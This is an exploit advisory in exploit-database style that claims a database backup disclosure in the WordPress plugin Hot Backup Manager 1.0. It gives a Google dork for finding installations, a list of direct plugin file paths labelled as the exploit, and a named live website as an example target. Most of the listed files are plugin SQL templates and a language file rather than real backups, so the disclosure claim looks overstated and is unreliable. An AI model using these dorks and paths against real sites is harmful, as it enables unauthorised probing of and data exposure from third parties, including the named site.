################################################################################################# # Exploit Title : WordPress Hot Backup Manager 1.0 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 02/12/2018 # Software Created Date By Owner : 16th March 2012 # Vendor Homepage : wordpress.org ~ github.com/eugene-manuilov # Software Download Link : N/A # Tested On : Windows and Linux # Version Information : 1.0 # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/BackupManager/libs/'' # CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018110139 # Exploit4Arab Exploit Link : exploit4arab.org/exploits/2244 # ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31469 # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/plugins/BackupManager/libs/amazone/lib/cachecore/_sql/mysql.sql /wp-content/plugins/BackupManager/libs/amazone/lib/cachecore/_sql/pgsql.sql /wp-content/plugins/BackupManager/libs/amazone/lib/cachecore/_sql/sqlite3.sql /wp-content/plugins/BackupManager/templates/sql/dump-footer.sql /wp-content/plugins/BackupManager/templates/sql/dump-header.sql /wp-content/plugins/BackupManager/templates/sql/function.sql /wp-content/plugins/BackupManager/templates/sql/insert-after.sql /wp-content/plugins/BackupManager/templates/sql/insert-before.sql /wp-content/plugins/BackupManager/templates/sql/procedure.sql /wp-content/plugins/BackupManager/templates/sql/table.sql /wp-content/plugins/BackupManager/templates/sql/trigger.sql /wp-content/plugins/BackupManager/templates/sql/view.sql /wp-content/plugins/BackupManager/languages/hotbackup-en_US.mo ################################################################################################# # Example Vulnerable Site => [+] okanmarin.com.tr/wp-content/plugins/BackupManager/libs/amazone/lib/cachecore/_sql/mysql.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################